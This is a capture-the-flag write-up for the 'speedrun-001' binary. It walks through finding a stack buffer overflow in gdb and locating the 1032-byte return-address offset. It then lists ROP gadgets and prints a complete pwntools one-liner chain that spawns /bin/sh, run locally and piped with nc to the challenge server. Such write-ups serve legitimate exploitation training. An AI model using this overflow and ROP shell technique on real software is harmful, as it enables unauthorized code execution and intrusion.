Rating: 0

1. First thing need to do is check memory protection:

```
xxx@ubuntu:~/OOOCTF$ checksec speedrun-001

[*] '/home/xxx/OOOCTF/speedrun-001'

Arch: amd64-64-little

RELRO: Partial RELRO

Stack: No canary found

**NX: NX enabled**

PIE: No PIE (0x400000)
```

2. generate big payload

`xxx@ubuntu:~/OOOCTF$ python -c 'print "a"*10240' > test.txt`

3. check memory/stack in debugger(gdb)
```

xxx@ubuntu:~/OOOCTF$ gdb ./speedrun-001

GNU gdb (Ubuntu 7.11.1-0ubuntu1~16.5) 7.11.1

Copyright (C) 2016 Free Software Foundation, Inc.

License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>

This is free software: you are free to change and redistribute it.

There is NO WARRANTY, to the extent permitted by law. Type "show copying"

and "show warranty" for details.

This GDB was configured as "x86_64-linux-gnu".

Type "show configuration" for configuration details.

For bug reporting instructions, please see:

<http://www.gnu.org/software/gdb/bugs/>.

Find the GDB manual and other documentation resources online at:

<http://www.gnu.org/software/gdb/documentation/>.

For help, type "help".

Type "apropos word" to search for commands related to "word"...

Reading symbols from ./speedrun-001...(no debugging symbols found)...done.

(gdb) r < test.txt

Starting program: /home/pan/OOOCTF/speedrun-001 < test.txt

Hello brave new challenger

Any last words?

This will be the last thing that you say: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa�����

Program received signal SIGSEGV, Segmentation fault.

0x0000000000400bad in ?? ()

(gdb) bt

#0 0x0000000000400bad in ?? ()

**#1 0x6161616161616161 in ?? ()**

#2 0x6161616161616161 in ?? ()

#3 0x6161616161616161 in ?? ()

#4 0x6161616161616161 in ?? ()

#5 0x6161616161616161 in ?? ()

#6 0x6161616161616161 in ?? ()

#7 0x6161616161616161 in ?? ()

#8 0x6161616161616161 in ?? ()

#9 0x6161616161616161 in ?? ()

#10 0x6161616161616161 in ?? ()

#11 0x6161616161616161 in ?? ()

#12 0x6161616161616161 in ?? ()

#13 0x6161616161616161 in ?? ()

#14 0x6161616161616161 in ?? ()

#15 0x6161616161616161 in ?? ()

#16 0x6161616161616161 in ?? ()

#17 0x6161616161616161 in ?? ()

#18 0x6161616161616161 in ?? ()

#19 0x6161616161616161 in ?? ()

#20 0x6161616161616161 in ?? ()

#21 0x6161616161616161 in ?? ()

#22 0x6161616161616161 in ?? ()

#23 0x6161616161616161 in ?? ()

#24 0x6161616161616161 in ?? ()

#25 0x6161616161616161 in ?? ()

---Type <return> to continue, or q <return> to quit---q

========> return address is changed(you can using to see it, this is special method I found), and you can see possibility of ROP chain

```

4. change payload to locate the EIP position(blind hacking, you can using static analysis to anlysis it)

```
xxx@ubuntu:~/OOOCTF$ python -c 'print "a"*100+"b"*100+"c"*100+"d"*100+"e"*100+"f"*100+"g"*100+"h"*100+"i"*100+"j"*100+"k"*100' > test.txt

(gdb) bt

#0 0x0000000000400bad in ?? ()

**#1 0x6b6b6b6b6b6b6b6b in ?? ()**

#2 0x6b6b6b6b6b6b6b6b in ?? ()

#3 0x6b6b6b6b6b6b6b6b in ?? ()

#4 0x6b6b6b6b6b6b6b6b in ?? ()

0x6b6b6b6b6b6b6b6b in ?? ()

#6 0x6b6b6b6b6b6b6b6b in ?? ()

#7 0x6b6b6b6b6b6b6b6b in ?? ()

#8 0x6b6b6b6b6b6b6b6b in ?? ()

#9 0x0000000a6b6b6b6b in ?? ()

#10 0x0000000000000000 in ?? ()

k is 0x6b => payload change "a"*1000+"b"*100 to confirm it

continue to test:

python -c 'print "a"*1000+"b"*50+"c"*50' > test.txt => #1 0x6262626262626262 in ?? ()

python -c 'print "a"*1000+"b"*20+"c"*20+"d"*20+"e"*20+"f"*20' > test.txt => #1 0x6363636363636363 in ?? ()

python -c 'print "a"*1025+"b"*10+"c"*10+"d"*10+"e"*10+"f"*10' > test.txt => #1 0x6363636363626262 in ?? ()

python -c 'print "a"*1025+"b"*7+"c"*8+"d"*8' > test.txt => #1 0x6363636363636363 in ?? () => c is the address of return address

python -c 'from pwn import *; print "a"*1032+p64(0x1234567890abcdef)+p64(0xfedcba0987654321)+p64(0x1234567890abcdef)+p64(0xfedcba0987654321)'

(gdb) bt

#0 0x0000000000400bad in ?? ()

#1 0x1234567890abcdef in ?? ()

#2 0xfedcba0987654321 in ?? () # rop chain

#3 0x1234567890abcdef in ?? () # rop chain

#4 0xfedcba0987654321 in ?? () # rop chain

#5 0x000000000040110a in ?? () # rop chain

#6 0x0000000000400a5a in ?? ()

(gdb)
```

5. start to find gadgets:

```
example of bind shell

eax = 11

ebx = address of "/bin/sh"

ecx = 0

edx = 0

int 0x80

0x0000000000415664 : pop rax ; ret

0x0000000000400df8 : pop rbx ; ret

0x00000000004498b5 : pop rdx ; ret

0x0000000000488464 : mov qword ptr [rbx + 0x18], rax ; pop rbx ; ret

0x0000000000488538 : mov qword ptr [rbx + 0x20], rax ; pop rbx ; ret

0x000000000044f088 : xchg byte ptr [rax - 0x75], cl ; ret

0x000000000046817a : int 0x80

0x0000000000422e05 : lea rcx, [rdx - 8] ; cmovne rax, rcx ; ret

starting to build up:

; gadgets of mov qword ptr[addr], data => *addr=(unsigned long long)data;

p64(0x415664)+p64(data)+p64(0x400df8)+p64(addr-0x18)+p64(0x488464)+"JUNKJUNK"

; *.bss = "/bin/sh";

p64(0x415664)+"/bin/sh\00"+p64(0x400df8)+p64(0x6BCA00-0x18)+p64(0x488464)+"JUNKJUNK"

; rax, rbx, rcx, rdx setting

p64(0x4498b5)+p64(dataRCX+8)+p64(0x422e05)+p64(0x415664)+p64(dataRAX)+p64(0x400df8)+p64(dataRBX)+p64(0x4498b5)+p64(dataRDX)

; execve("/bin/sh/", 0, 0); => rax = 11, rbx = .bss, rcx = 0, rdx = 0 & int 0x80

p64(0x415664)+"/bin/sh\00"+p64(0x400df8)+p64(0x6BCA00-0x18)+p64(0x488464)+"JUNKJUNK"+

p64(0x4498b5)+p64(8)+p64(0x422e05)+p64(0x415664)+p64(11)+p64(0x400df8)+p64(0x6BCA00)+p64(0x4498b5)+p64(0)+

p64(0x46817a)

; pwned !!!

; local

(python -c 'from pwn import *;print "a"*1032+p64(0x415664)+"/bin/sh\00"+p64(0x400df8)+p64(0x6BCA00-0x18)+p64(0x488464)+"JUNKJUNK"+p64(0x4498b5)+p64(8)+p64(0x422e05)+p64(0x415664)+p64(11)+p64(0x400df8)+p64(0x6BCA00)+p64(0x4498b5)+p64(0)+p64(0x46817a)+"\n"'; cat -) | ./speedrun-001

Hello brave new challenger

Any last words?

This will be the last thing that you say: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaadVA

echo hacked by k1nm3nh4ck3r

hacked by k1nm3nh4ck3r

; remote

(python -c 'from pwn import *;print "a"*1032+p64(0x415664)+"/bin/sh\00"+p64(0x400df8)+p64(0x6BCA00-

0x18)+p64(0x488464)+"JUNKJUNK"+p64(0x4498b5)+p64(8)+p64(0x422e05)+p64(0x415664)+p64(11)+p64(0x400df8)+p64(0x6BCA00)+p64(0x4498b5)+p64(0)+p64(

0x46817a)+"\n"'; cat -) | nc speedrun-001.quals2019.oooverflow.io 31337

=> 'cat flag' you will see the flag
```

Reference:

1. https://failingsilently.wordpress.com/2017/12/14/rop-chain-shell/